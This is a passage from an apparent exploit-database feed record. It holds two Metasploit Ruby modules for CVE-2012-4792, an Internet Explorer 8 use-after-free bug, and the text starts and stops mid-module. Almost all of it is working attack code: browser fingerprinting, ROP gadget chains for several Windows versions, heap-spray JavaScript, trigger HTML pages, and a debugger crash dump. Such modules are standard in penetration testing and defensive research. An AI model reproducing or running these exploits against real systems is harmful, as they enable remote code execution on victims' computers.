A\r\n\t\t\t\tuse-after-free condition occurs when a CButton object is freed, but a reference\r\n\t\t\t\tis kept and used again during a page reload, an invalid memory that's controllable\r\n\t\t\t\tis used, and allows arbitrary code execution under the context of the user.\r\n\r\n\t\t\t\t\tPlease note: This vulnerability has been exploited in the wild targeting\r\n\t\t\t\tmainly China/Taiwan/and US-based computers.\r\n\t\t\t},\r\n\t\t\t'License' => MSF_LICENSE,\r\n\t\t\t'Author' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t'eromang',\r\n\t\t\t\t\t'mahmud ab rahman',\r\n\t\t\t\t\t'juan vazquez', #Metasploit\r\n\t\t\t\t\t'sinn3r', #Metasploit\r\n\t\t\t\t\t'Peter Vreugdenhil' #New trigger & new exploit technique\r\n\t\t\t\t],\r\n\t\t\t'References' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t[ 'CVE', '2012-4792' ],\r\n\t\t\t\t\t[ 'US-CERT-VU', '154201' ],\r\n\t\t\t\t\t[ 'BID', '57070' ],\r\n\t\t\t\t\t[ 'URL', 'http://blog.fireeye.com/research/2012/12/council-foreign-relations-water-hole-attack-details.html'],\r\n\t\t\t\t\t[ 'URL', 'http://eromang.zataz.com/2012/12/29/attack-and-ie-0day-informations-used-against-council-on-foreign-relations/'],\r\n\t\t\t\t\t[ 'URL', 'http://blog.vulnhunt.com/index.php/2012/12/29/new-ie-0day-coming-mshtmlcdwnbindinfo-object-use-after-free-vulnerability/' ],\r\n\t\t\t\t\t[ 'URL', 'http://technet.microsoft.com/en-us/security/advisory/2794220' ],\r\n\t\t\t\t\t[ 'URL', 'http://blogs.technet.com/b/srd/archive/2012/12/29/new-vulnerability-affecting-internet-explorer-8-users.aspx' ],\r\n\t\t\t\t\t[ 'URL', 'http://blog.exodusintel.com/2013/01/02/happy-new-year-analysis-of-cve-2012-4792/' ],\r\n\t\t\t\t\t[ 'URL', 'https://community.rapid7.com/community/metasploit/blog/2012/12/29/microsoft-internet-explorer-0-day-marks-the-end-of-2012' ]\r\n\t\t\t\t],\r\n\t\t\t'Payload' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'BadChars' => \"\\x00\",\r\n\t\t\t\t\t'Space' => 1024,\r\n\t\t\t\t\t'DisableNops' => true\r\n\t\t\t\t},\r\n\t\t\t'DefaultOptions' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'InitialAutoRunScript' => 'migrate -f'\r\n\t\t\t\t},\r\n\t\t\t'Platform' => 'win',\r\n\t\t\t'Targets' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t[ 'Automatic', {} ],\r\n\t\t\t\t\t[ 'IE 8 on Windows XP SP3', { 'Rop' => :msvcrt } ],\r\n\t\t\t\t\t[ 'IE 8 on Windows Vista', { 'Rop' => :jre } ],\r\n\t\t\t\t\t[ 'IE 8 on Windows Server 2003', { 'Rop' => :msvcrt } ],\r\n\t\t\t\t\t[ 'IE 8 on Windows 7', { 'Rop' => :jre } ]\r\n\t\t\t\t],\r\n\t\t\t'Privileged' => false,\r\n\t\t\t'DisclosureDate' => \"Dec 27 2012\",\r\n\t\t\t'DefaultTarget' => 0))\r\n\r\n\t\tregister_options(\r\n\t\t\t[\r\n\t\t\t\tOptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation', false])\r\n\t\t\t], self.class)\r\n\r\n\tend\r\n\r\n\tdef get_target(agent)\r\n\t\t#If the user is already specified by the user, we'll just use that\r\n\t\treturn target if target.name != 'Automatic'\r\n\r\n\t\tnt = agent.scan(/Windows NT (\\d\\.\\d)/).flatten[0] || ''\r\n\t\tie = agent.scan(/MSIE (\\d)/).flatten[0] || ''\r\n\r\n\t\tie_name = \"IE #{ie}\"\r\n\r\n\t\tcase nt\r\n\t\twhen '5.1'\r\n\t\t\tos_name = 'Windows XP SP3'\r\n\t\twhen '5.2'\r\n\t\t\tos_name = 'Windows Server 2003'\r\n\t\twhen '6.0'\r\n\t\t\tos_name = 'Windows Vista'\r\n\t\twhen '6.1'\r\n\t\t\tos_name = 'Windows 7'\r\n\t\telse\r\n\t\t\t# OS not supported\r\n\t\t\treturn nil\r\n\t\tend\r\n\r\n\t\ttargets.each do |t|\r\n\t\t\tif (!ie.empty? and t.name.include?(ie_name)) and (!nt.empty? and t.name.include?(os_name))\r\n\t\t\t\tprint_status(\"Target selected as: #{t.name}\")\r\n\t\t\t\treturn t\r\n\t\t\tend\r\n\t\tend\r\n\r\n\t\treturn nil\r\n\tend\r\n\r\n\tdef ie8_smil(my_target, p)\r\n\r\n\t\tcase my_target['Rop']\r\n\t\twhen :msvcrt\r\n\t\t\tcase my_target.name\r\n\t\t\twhen 'IE 8 on Windows XP SP3'\r\n\t\t\t\talign_esp = Rex::Text.to_unescape([0x77c4d801].pack(\"V*\")) # ADD ESP, 2C; RET\r\n\t\t\t\txchg_esp = Rex::Text.to_unescape([0x77c15ed5].pack(\"V*\")) # XCHG EAX, ESP, RET\r\n\t\t\twhen 'IE 8 on Windows Server 2003'\r\n\t\t\t\talign_esp = Rex::Text.to_unescape([0x77bde7f6].pack(\"V*\"))\r\n\t\t\t\txchg_esp = Rex::Text.to_unescape([0x77bcba5e].pack(\"V*\"))\r\n\t\t\tend\r\n\t\telse\r\n\t\t\talign_esp = Rex::Text.to_unescape([0x7C3445F8].pack(\"V*\"))\r\n\t\t\txchg_esp = Rex::Text.to_unescape([0x7C348B05].pack(\"V*\"))\r\n\t\tend\r\n\r\n\t\tpadding = Rex::Text.to_unescape(Rex::Text.rand_text_alpha(4))\r\n\t\tjs_payload = Rex::Text.to_unescape(p)\r\n\r\n\t\tjs = %Q|\r\n\t\tunicorn = unescape(\"#{padding}\");\r\n\t\tfor (i=0; i < 3; i++) {\r\n\t\t\tunicorn += unescape(\"#{padding}\");\r\n\t\t}\r\n\r\n\t\tunicorn += unescape(\"#{js_payload}\");\r\n\r\n\t\tanimvalues = unescape(\"#{align_esp}\");\r\n\r\n\t\tfor (i=0; i < 0xDC/4; i++) {\r\n\t\t\tif (i == 0xDC/4-1) {\r\n\t\t\t\tanimvalues += unescape(\"#{xchg_esp}\");\r\n\t\t\t}\r\n\t\t\telse {\r\n\t\t\t\tanimvalues += unescape(\"#{align_esp}\");\r\n\t\t\t}\r\n\t\t}\r\n\r\n\t\tanimvalues += unicorn;\r\n\r\n\t\tfor(i = 0; i < 21; i++) {\r\n\t\t\tanimvalues += \";cyan\";\r\n\t\t}\r\n\t\t|\r\n\r\n\t\tif datastore['OBFUSCATE']\r\n\t\t\tjs = ::Rex::Exploitation::JSObfu.new(js)\r\n\t\t\tjs.obfuscate\r\n\t\tend\r\n\r\n\t\treturn js\r\n\tend\r\n\r\n\tdef junk(n=4)\r\n\t\treturn rand_text_alpha(n).unpack(\"V\")[0].to_i\r\n\tend\r\n\r\n\tdef nop\r\n\t\treturn make_nops(4).unpack(\"V\")[0].to_i\r\n\tend\r\n\r\n\tdef get_payload(t, cli)\r\n\t\tcode = payload.encoded\r\n\r\n\t\t# No rop. Just return the payload.\r\n\t\treturn code if t['Rop'].nil?\r\n\r\n\t\tcase t['Rop']\r\n\t\twhen :msvcrt\r\n\t\t\tcase t.name\r\n\t\t\twhen 'IE 8 on Windows XP SP3'\r\n\t\t\t\trop_gadgets =\r\n\t\t\t\t[\r\n\t\t\t\t\t0x77c1e844, # POP EBP # RETN [msvcrt.dll]\r\n\t\t\t\t\t0x77c1e844, # skip 4 bytes [msvcrt.dll]\r\n\t\t\t\t\t0x77c4fa1c, # POP EBX # RETN [msvcrt.dll]\r\n\t\t\t\t\t0xffffffff,\r\n\t\t\t\t\t0x77c127e5, # INC EBX # RETN [msvcrt.dll]\r\n\t\t\t\t\t0x77c127e5, # INC EBX # RETN [msvcrt.dll]\r\n\t\t\t\t\t0x77c4e0da, # POP EAX # RETN [msvcrt.dll]\r\n\t\t\t\t\t0x2cfe1467, # put delta into eax (-> put 0x00001000 into edx)\r\n\t\t\t\t\t0x77c4eb80, # ADD EAX,75C13B66 # ADD EAX,5D40C033 # RETN [msvcrt.dll]\r\n\t\t\t\t\t0x77c58fbc, # XCHG EAX,EDX # RETN [msvcrt.dll]\r\n\t\t\t\t\t0x77c34fcd, # POP EAX # RETN [msvcrt.dll]\r\n\t\t\t\t\t0x2cfe04a7, # put delta into eax (-> put 0x00000040 into ecx)\r\n\t\t\t\t\t0x77c4eb80, # ADD EAX,75C13B66 # ADD EAX,5D40C033 # RETN [msvcrt.dll]\r\n\t\t\t\t\t0x77c14001, # XCHG EAX,ECX # RETN [msvcrt.dll]\r\n\t\t\t\t\t0x77c3048a, # POP EDI # RETN [msvcrt.dll]\r\n\t\t\t\t\t0x77c47a42, # RETN (ROP NOP) [msvcrt.dll]\r\n\t\t\t\t\t0x77c46efb, # POP ESI # RETN [msvcrt.dll]\r\n\t\t\t\t\t0x77c2aacc, # JMP [EAX] [msvcrt.dll]\r\n\t\t\t\t\t0x77c3b860, # POP EAX # RETN [msvcrt.dll]\r\n\t\t\t\t\t0x77c1110c, # ptr to &VirtualAlloc() [IAT msvcrt.dll]\r\n\t\t\t\t\t0x77c12df9, # PUSHAD # RETN [msvcrt.dll]\r\n\t\t\t\t\t0x77c35459 # ptr to 'push esp # ret ' [msvcrt.dll]\r\n\t\t\t\t].pack(\"V*\")\r\n\t\t\twhen 'IE 8 on Windows Server 2003'\r\n\t\t\t\trop_gadgets =\r\n\t\t\t\t[\r\n\t\t\t\t\t0x77bb2563, # POP EAX # RETN\r\n\t\t\t\t\t0x77ba1114, # <- *&VirtualProtect()\r\n\t\t\t\t\t0x77bbf244, # MOV EAX,DWORD PTR DS:[EAX] # POP EBP # RETN\r\n\t\t\t\t\tjunk,\r\n\t\t\t\t\t0x77bb0c86, # XCHG EAX,ESI # RETN\r\n\t\t\t\t\t0x77bc9801, # POP EBP # RETN\r\n\t\t\t\t\t0x77be2265, # ptr to 'push esp # ret'\r\n\t\t\t\t\t0x77bb2563, # POP EAX # RETN\r\n\t\t\t\t\t0x03C0990F,\r\n\t\t\t\t\t0x77bdd441, # SUB EAX, 03c0940f (dwSize, 0x500 -> ebx)\r\n\t\t\t\t\t0x77bb48d3, # POP EBX, RET\r\n\t\t\t\t\t0x77bf21e0, # .data\r\n\t\t\t\t\t0x77bbf102, # XCHG EAX,EBX # ADD BYTE PTR DS:[EAX],AL # RETN\r\n\t\t\t\t\t0x77bbfc02, # POP ECX # RETN\r\n\t\t\t\t\t0x77bef001, # W pointer (lpOldProtect) (-> ecx)\r\n\t\t\t\t\t0x77bd8c04, # POP EDI # RETN\r\n\t\t\t\t\t0x77bd8c05, # ROP NOP (-> edi)\r\n\t\t\t\t\t0x77bb2563, # POP EAX # RETN\r\n\t\t\t\t\t0x03c0984f,\r\n\t\t\t\t\t0x77bdd441, # SUB EAX, 03c0940f\r\n\t\t\t\t\t0x77bb8285, # XCHG EAX,EDX # RETN\r\n\t\t\t\t\t0x77bb2563, # POP EAX # RETN\r\n\t\t\t\t\tnop,\r\n\t\t\t\t\t0x77be6591 # PUSHAD # ADD AL,0EF # RETN\r\n\t\t\t\t].pack(\"V*\")\r\n\t\t\tend\r\n\t\telse\r\n\t\t\trop_gadgets =\r\n\t\t\t[\r\n\t\t\t\t0x7c37653d, # POP EAX # POP EDI # POP ESI # POP EBX # POP EBP # RETN\r\n\t\t\t\t0xfffffdff, # Value to negate, will become 0x00000201 (dwSize)\r\n\t\t\t\t0x7c347f98, # RETN (ROP NOP) [msvcr71.dll]\r\n\t\t\t\t0x7c3415a2, # JMP [EAX] [msvcr71.dll]\r\n\t\t\t\t0xffffffff,\r\n\t\t\t\t0x7c376402, # skip 4 bytes [msvcr71.dll]\r\n\t\t\t\t0x7c351e05, # NEG EAX # RETN [msvcr71.dll]\r\n\t\t\t\t0x7c345255, # INC EBX # FPATAN # RETN [msvcr71.dll]\r\n\t\t\t\t0x7c352174, # ADD EBX,EAX # XOR EAX,EAX # INC EAX # RETN [msvcr71.dll]\r\n\t\t\t\t0x7c344f87, # POP EDX # RETN [msvcr71.dll]\r\n\t\t\t\t0xffffffc0, # Value to negate, will become 0x00000040\r\n\t\t\t\t0x7c351eb1, # NEG EDX # RETN [msvcr71.dll]\r\n\t\t\t\t0x7c34d201, # POP ECX # RETN [msvcr71.dll]\r\n\t\t\t\t0x7c38b001, # &Writable location [msvcr71.dll]\r\n\t\t\t\t0x7c347f97, # POP EAX # RETN [msvcr71.dll]\r\n\t\t\t\t0x7c37a151, # ptr to &VirtualProtect() - 0x0EF [IAT msvcr71.dll]\r\n\t\t\t\t0x7c378c81, # PUSHAD # ADD AL,0EF # RETN [msvcr71.dll]\r\n\t\t\t\t0x7c345c30 # ptr to 'push esp # ret ' [msvcr71.dll]\r\n\t\t\t\t# rop chain generated with mona.py\r\n\t\t\t].pack(\"V*\")\r\n\t\tend\r\n\r\n\t\trop_payload = rop_gadgets\r\n\t\tcase t['Rop']\r\n\t\twhen :msvcrt\r\n\t\t\trop_payload << \"\\x81\\xc4\\x54\\xf2\\xff\\xff\" # Stack adjustment # add esp, -3500\r\n\t\telse\r\n\t\t\trop_payload << \"\\x81\\xEC\\xF0\\xD8\\xFF\\xFF\" # sub esp, -10000\r\n\t\tend\r\n\t\trop_payload << code\r\n\t\trop_payload << rand_text_alpha(12000) unless t['Rop'] == :msvcrt\r\n\r\n\t\treturn rop_payload\r\n\tend\r\n\r\n\tdef load_exploit_html(my_target, cli)\r\n\r\n\t\tp = get_payload(my_target, cli)\r\n\t\tjs = ie8_smil(my_target, p)\r\n\r\n\t\thtml = %Q|\r\n\t\t<!doctype html>\r\n\t\t<HTML XMLNS:t =\"urn:schemas-microsoft-com:time\">\r\n\t\t<head>\r\n\t\t<meta>\r\n\t\t\t<?IMPORT namespace=\"t\" implementation=\"#default#time2\">\r\n\t\t</meta>\r\n\r\n\t\t<script>\r\n\t\tfunction helloWorld()\r\n\t\t{\r\n\t\t\te_form = document.getElementById(\"formelm\");\r\n\t\t\te_div = document.getElementById(\"divelm\");\r\n\r\n\t\t\t#{js}\r\n\r\n\t\t\tfor(i =0; i < 20; i++) {\r\n\t\t\t\tdocument.createElement('button');\r\n\t\t\t}\r\n\t\t\te_div.appendChild(document.createElement('button'))\r\n\t\t\te_div.firstChild.applyElement(e_form);\r\n\r\n\t\t\te_div.innerHTML = \"\"\r\n\t\t\te_div.appendChild(document.createElement('body'));\r\n\r\n\t\t\tCollectGarbage();\r\n\r\n\t\t\ttry {\r\n\t\t\t\ta = document.getElementById('myanim');\r\n\t\t\t\ta.values = animvalues;\r\n\t\t\t}\r\n\t\t\tcatch(e) {}\r\n\t\t}\r\n\r\n\t\t</script>\r\n\t\t</head>\r\n\t\t<body onload=\"eval(helloWorld())\">\r\n\t\t<t:ANIMATECOLOR id=\"myanim\"/>\r\n\t\t<div id=\"divelm\"></div>\r\n\t\t<form id=\"formelm\">\r\n\t\t</form>\r\n\t\t</body>\r\n\t\t</html>\r\n\t\t|\r\n\r\n\t\treturn html\r\n\tend\r\n\r\n\tdef on_request_uri(cli, request)\r\n\t\tagent = request.headers['User-Agent']\r\n\t\turi = request.uri\r\n\t\tprint_status(\"Requesting: #{uri}\")\r\n\r\n\t\tmy_target = get_target(agent)\r\n\t\t# Avoid the attack if no suitable target found\r\n\t\tif my_target.nil?\r\n\t\t\tprint_error(\"Browser not supported, sending 404: #{agent}\")\r\n\t\t\tsend_not_found(cli)\r\n\t\t\treturn\r\n\t\tend\r\n\r\n\t\thtml = load_exploit_html(my_target, cli)\r\n\t\thtml = html.gsub(/^\\t\\t/, '')\r\n\t\tprint_status(\"Sending HTML...\")\r\n\t\tsend_response(cli, html, {'Content-Type'=>'text/html'})\r\n\tend\r\n\r\nend\r\n\r\n\r\n=begin\r\n(87c.f40): Access violation - code c0000005 (first chance)\r\nFirst chance exceptions are reported before any exception handling.\r\nThis exception may be expected and handled.\r\neax=12120d0c ebx=0023c218 ecx=00000052 edx=00000000 esi=00000000 edi=0301e400\r\neip=637848c3 esp=020bf834 ebp=020bf8a4 iopl=0 nv up ei pl nz na pe nc\r\ncs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010206\r\nmshtml!CMarkup::OnLoadStatusDone+0x504:\r\n637848c3 ff90dc000000 call dword ptr <Unloaded_Ed20.dll>+0xdb (000000dc)[eax] ds:0023:12120de8=????????\r\n0:008> k\r\nChildEBP RetAddr\r\n020bf8a4 635c378b mshtml!CMarkup::OnLoadStatusDone+0x504\r\n020bf8c4 635c3e16 mshtml!CMarkup::OnLoadStatus+0x47\r\n020bfd10 636553f8 mshtml!CProgSink::DoUpdate+0x52f\r\n020bfd24 6364de62 mshtml!CProgSink::OnMethodCall+0x12\r\n020bfd58 6363c3c5 mshtml!GlobalWndOnMethodCall+0xfb\r\n020bfd78 7e418734 mshtml!GlobalWndProc+0x183\r\n020bfda4 7e418816 USER32!InternalCallWinProc+0x28\r\n020bfe0c 7e4189cd USER32!UserCallWinProcCheckWow+0x150\r\n020bfe6c 7e418a10 USER32!DispatchMessageWorker+0x306\r\n020bfe7c 01252ec9 USER32!DispatchMessageW+0xf\r\n020bfeec 011f48bf IEFRAME!CTabWindow::_TabWindowThreadProc+0x461\r\n020bffa4 5de05a60 IEFRAME!LCIETab_ThreadProc+0x2c1\r\n020bffb4 7c80b713 iertutil!CIsoScope::RegisterThread+0xab\r\n020bffec 00000000 kernel32!BaseThreadStart+0x37\r\n\r\n0:008> r\r\neax=0c0c0c0c ebx=0023c1d0 ecx=00000052 edx=00000000 esi=00000000 edi=033e9120\r\neip=637848c3 esp=020bf834 ebp=020bf8a4 iopl=0 nv up ei pl nz na po nc\r\ncs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010202\r\nmshtml!CMarkup::OnLoadStatusDone+0x504:\r\n637848c3 ff90dc000000 call dword ptr [eax+0DCh] ds:0023:0c0c0ce8=????????\r\n=end", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/23785/"}, {"lastseen": "2016-02-02T21:44:07", "bulletinFamily": "exploit", "description": "Microsoft Internet Explorer CDwnBindInfo Object Use-After-Free Vulnerability. CVE-2012-4792. Remote exploit for windows platform", "modified": "2012-12-31T00:00:00", "published": "2012-12-31T00:00:00", "id": "EDB-ID:23754", "href": "https://www.exploit-db.com/exploits/23754/", "type": "exploitdb", "title": "Microsoft Internet Explorer CDwnBindInfo Object Use-After-Free Vulnerability", "sourceData": "##\r\n# This file is part of the Metasploit Framework and may be subject to\r\n# redistribution and commercial restrictions. Please see the Metasploit\r\n# Framework web site for more information on licensing and terms of use.\r\n# http://metasploit.com/framework/\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n\tRank = NormalRanking\r\n\r\n\tinclude Msf::Exploit::Remote::HttpServer::HTML\r\n\tinclude Msf::Exploit::RopDb\r\n\r\n\tdef initialize(info={})\r\n\t\tsuper(update_info(info,\r\n\t\t\t'Name' => \"Microsoft Internet Explorer CDwnBindInfo Object Use-After-Free Vulnerability\",\r\n\t\t\t'Description' => %q{\r\n\t\t\t\t\tThis module exploits a vulnerability found in Microsoft Internet Explorer. A\r\n\t\t\t\tuse-after-free condition occurs when a CDwnBindInfo object is freed by\r\n\t\t\t\tFollowHyperlink2, but a reference is kept in CDoc. As a result, when the reference\r\n\t\t\t\tis used again during a page reload, an invalid memory that's controllable is used,\r\n\t\t\t\tand allows arbitrary code execution under the context of the user.\r\n\r\n\t\t\t\t\tPlease note: This vulnerability has been exploited in the wild targeting\r\n\t\t\t\tmainly China/Taiwan/and US-based computers.\r\n\t\t\t},\r\n\t\t\t'License' => MSF_LICENSE,\r\n\t\t\t'Author' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t'eromang',\r\n\t\t\t\t\t'mahmud ab rahman',\r\n\t\t\t\t\t'sinn3r' #Metasploit\r\n\t\t\t\t],\r\n\t\t\t'References' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t[ 'CVE', '2012-4792' ],\r\n\t\t\t\t\t[ 'US-CERT-VU', '154201' ],\r\n\t\t\t\t\t[ 'URL', 'http://blog.fireeye.com/research/2012/12/council-foreign-relations-water-hole-attack-details.html'],\r\n\t\t\t\t\t[ 'URL', 'http://eromang.zataz.com/2012/12/29/attack-and-ie-0day-informations-used-against-council-on-foreign-relations/'],\r\n\t\t\t\t\t[ 'URL', 'http://blog.vulnhunt.com/index.php/2012/12/29/new-ie-0day-coming-mshtmlcdwnbindinfo-object-use-after-free-vulnerability/' ],\r\n\t\t\t\t\t[ 'URL', 'http://technet.microsoft.com/en-us/security/advisory/2794220' ]\r\n\t\t\t\t],\r\n\t\t\t'Payload' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'Space' => 980,\r\n\t\t\t\t\t'DisableNops' => true,\r\n\t\t\t\t\t'PrependEncoder' => \"\\x81\\xc4\\x54\\xf2\\xff\\xff\" # Stack adjustment # add esp, -3500\r\n\t\t\t\t},\r\n\t\t\t'DefaultOptions' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'InitialAutoRunScript' => 'migrate -f'\r\n\t\t\t\t},\r\n\t\t\t'Platform' => 'win',\r\n\t\t\t'Targets' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t[ 'Automatic', {} ],\r\n\t\t\t\t\t[ 'IE 8 on Windows XP SP3', { 'Rop' => :msvcrt, 'Offset' => '0x586' } ], # 0x0c0c0b30\r\n\t\t\t\t\t[ 'IE 8 on Windows Vista', { 'Rop' => :jre, 'Offset' => '0x586' } ], # 0x0c0c0b30\r\n\t\t\t\t\t[ 'IE 8 on Windows Server 2003', { 'Rop' => :msvcrt, 'Offset' => '0x586' } ], # 0x0c0c0b30\r\n\t\t\t\t\t[ 'IE 8 on Windows 7', { 'Rop' => :jre, 'Offset' => '0x586' } ] # 0x0c0c0b30\r\n\t\t\t\t],\r\n\t\t\t'Privileged' => false,\r\n\t\t\t'DisclosureDate' => \"Dec 27 2012\",\r\n\t\t\t'DefaultTarget' => 0))\r\n\r\n\t\tregister_options(\r\n\t\t\t[\r\n\t\t\t\tOptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation', false])\r\n\t\t\t], self.class)\r\n\r\n\tend\r\n\r\n\tdef get_target(agent)\r\n\t\t#If the user is already specified by the user, we'll just use that\r\n\t\treturn target if target.name != 'Automatic'\r\n\r\n\t\tnt = agent.scan(/Windows NT (\\d\\.\\d)/).flatten[0] || ''\r\n\t\tie = agent.scan(/MSIE (\\d)/).flatten[0] || ''\r\n\r\n\t\tie_name = \"IE #{ie}\"\r\n\r\n\t\tcase nt\r\n\t\twhen '5.1'\r\n\t\t\tos_name = 'Windows XP SP3'\r\n\t\twhen '5.2'\r\n\t\t\tos_name = 'Windows Server 2003'\r\n\t\twhen '6.0'\r\n\t\t\tos_name = 'Windows Vista'\r\n\t\twhen '6.1'\r\n\t\t\tos_name = 'Windows 7'\r\n\t\telse\r\n\t\t\t# OS not supported\r\n\t\t\treturn nil\r\n\t\tend\r\n\r\n\t\ttargets.each do |t|\r\n\t\t\tif (!ie.empty? and t.name.include?(ie_name)) and (!nt.empty? and t.name.include?(os_name))\r\n\t\t\t\tprint_status(\"Target selected as: #{t.name}\")\r\n\t\t\t\treturn t\r\n\t\t\tend\r\n\t\tend\r\n\r\n\t\treturn nil\r\n\tend\r\n\r\n\tdef ie_heap_spray(my_target, p)\r\n\t\tjs_code = Rex::Text.to_unescape(p, Rex::Arch.endian(target.arch))\r\n\t\tjs_nops = Rex::Text.to_unescape(\"\\x0c\"*4, Rex::Arch.endian(target.arch))\r\n\r\n\t\t# Land the payload at 0x0c0c0b30\r\n\t\tjs = %Q|\r\n\t\tvar heap_obj = new heapLib.ie(0x20000);\r\n\t\tvar code = unescape(\"#{js_code}\");\r\n\t\tvar nops = unescape(\"#{js_nops}\");\r\n\t\twhile (nops.length < 0x80000) nops += nops;\r\n\t\tvar offset = nops.substring(0, #{my_target['Offset']});\r\n\t\tvar shellcode = offset + code + nops.substring(0, 0x800-code.length-offset.length);\r\n\t\twhile (shellcode.length < 0x40000) shellcode += shellcode;\r\n\t\tvar block = shellcode.substring(0, (0x80000-6)/2);\r\n\t\theap_obj.gc();\r\n\t\tfor (var i=1; i < 0x300; i++) {\r\n\t\t\theap_obj.alloc(block);\r\n\t\t}\r\n\t\tvar overflow = nops.substring(0, 10);\r\n\t\t|\r\n\r\n\t\tjs = heaplib(js, {:noobfu => true})\r\n\r\n\t\tif datastore['OBFUSCATE']\r\n\t\t\tjs = ::Rex::Exploitation::JSObfu.new(js)\r\n\t\t\tjs.obfuscate\r\n\t\tend\r\n\r\n\t\treturn js\r\n\tend\r\n\r\n\tdef get_payload(t, cli)\r\n\t\tcode = payload.encoded\r\n\r\n\t\t# No rop. Just return the payload.\r\n\t\treturn code if t['Rop'].nil?\r\n\r\n=begin\r\nStack Pivoting to eax:\r\n0:008> db eax\r\n0c0c0b30 0c 0c 0c 0c 0c 0c 0c 0c-0c 0c 0c 0c 0c 0c 0c 0c ................\r\n0c0c0b40 0c 0c 0c 0c 0c 0c 0c 0c-0c 0c 0c 0c 0c 0c 0c 0c ................\r\n=end\r\n\t\t# Both ROP chains generated by mona.py - See corelan.be\r\n\t\tcase t['Rop']\r\n\t\twhen :msvcrt\r\n\t\t\tprint_status(\"Using msvcrt ROP\")\r\n\t\t\tif t['Name'] =~ /Windows XP/\r\n\t\t\t\tstack_pivot = [0x77c15ed6].pack(\"V\") * 54 # ret\r\n\t\t\t\tstack_pivot << [0x77c2362c].pack(\"V\") # pop ebx, #ret\r\n\t\t\t\tstack_pivot << [0x77c15ed5].pack(\"V\") # xchg eax,esp # ret # 0x0c0c0c0c\r\n\t\t\t\trop_payload = generate_rop_payload('msvcrt', code, {'pivot'=>stack_pivot, 'target'=>'xp'})\r\n\t\t\telse\r\n\t\t\t\tstack_pivot = [0x77bcba5f].pack(\"V\") * 54 # ret\r\n\t\t\t\tstack_pivot << [0x77bb4158].pack(\"V\") # pop ebx, #ret\r\n\t\t\t\tstack_pivot << [0x77bcba5e].pack(\"V\") # xchg eax,esp # ret # 0x0c0c0c0c\r\n\t\t\t\trop_payload = generate_rop_payload('msvcrt', code, {'pivot'=>stack_pivot, 'target'=>'2003'})\r\n\t\t\tend\r\n\t\telse\r\n\t\t\tprint_status(\"Using JRE ROP\")\r\n\t\t\tstack_pivot = [0x7c348b06].pack(\"V\") * 54 # ret\r\n\t\t\tstack_pivot << [0x7c341748].pack(\"V\") # pop ebx, #ret\r\n\t\t\tstack_pivot << [0x7c348b05].pack(\"V\") # xchg eax,esp # ret # 0x0c0c0c0c\r\n\t\t\trop_payload = generate_rop_payload('java', code, {'pivot'=>stack_pivot})\r\n\t\tend\r\n\r\n\t\treturn rop_payload\r\n\tend\r\n\r\n\tdef load_exploit_html(my_target, cli)\r\n\r\n\t\tp = get_payload(my_target, cli)\r\n\t\tjs = ie_heap_spray(my_target, p)\r\n\r\n\t\thtml = %Q|\r\n\t\t<!doctype html>\r\n\t\t<html>\r\n\t\t<head>\r\n\t\t<script>\r\n\t\t#{js}\r\n\r\n\t\tfunction exploit()\r\n\t\t{\r\n\t\t\tvar e0 = null;\r\n\t\t\tvar e1 = null;\r\n\t\t\tvar e2 = null;\r\n\t\t\tvar arrObject = new Array(3000);\r\n\t\t\tvar elmObject = new Array(500);\r\n\t\t\tfor (var i = 0; i < arrObject.length; i++)\r\n\t\t\t{\r\n\t\t\t\tarrObject[i] = document.createElement('div');\r\n\t\t\t\tarrObject[i].className = unescape(\"ababababababababababababababababababababa\");\r\n\t\t\t}\r\n\r\n\t\t\tfor (var i = 0; i < arrObject.length; i += 2)\r\n\t\t\t{\r\n\t\t\t\tarrObject[i].className = null;\r\n\t\t\t}\r\n\r\n\t\t\tCollectGarbage();\r\n\r\n\t\t\tfor (var i = 0; i < elmObject.length; i ++)\r\n\t\t\t{\r\n\t\t\t\telmObject[i] = document.createElement('button');\r\n\t\t\t}\r\n\r\n\t\t\tfor (var i = 1; i < arrObject.length; i += 2)\r\n\t\t\t{\r\n\t\t\t\tarrObject[i].className = null;\r\n\t\t\t}\r\n\r\n\t\t\tCollectGarbage();\r\n\r\n\t\t\ttry {\r\n\t\t\t\te0 = document.getElementById(\"a\");\r\n\t\t\t\te1 = document.getElementById(\"b\");\r\n\t\t\t\te2 = document.createElement(\"q\");\r\n\t\t\t\te1.applyElement(e2);\r\n\t\t\t\te1.appendChild(document.createElement('button'));\r\n\t\t\t\te1.applyElement(e0);\r\n\t\t\t\te2.outerText = \"\";\r\n\t\t\t\te2.appendChild(document.createElement('body'));\r\n\t\t\t} catch(e) { }\r\n\t\t\tCollectGarbage();\r\n\t\t\tfor(var i =0; i < 20; i++)\r\n\t\t\t{\r\n\t\t\t\tarrObject[i].className = unescape(\"ababababababababababababababababababababa\");\r\n\t\t\t}\r\n\t\t\tvar eip = window;\r\n\t\t\tvar data = \"https://www.google.com/settings/account\";\r\n\t\t\teip.location = unescape(\"%u0b30%u0c0c\" + data);\r\n\r\n\t\t}\r\n\r\n\t\t</script>\r\n\t\t</head>\r\n\t\t<body onload=\"eval(exploit())\">\r\n\t\t<form id=\"a\">\r\n\t\t</form>\r\n\t\t<dfn id=\"b\">\r\n\t\t</dfn>\r\n\t\t</body>\r\n\t\t</html>\r\n\t\t|\r\n\r\n\t\treturn html\r\n\tend\r\n\r\n\tdef on_request_uri(cli, request)\r\n\t\tagent = request.headers['User-Agent']\r\n\t\turi = request.uri\r\n\t\tprint_status(\"Requesting: #{uri}\")\r\n\r\n\t\tmy_target = get_target(agent)\r\n\t\t# Avoid the 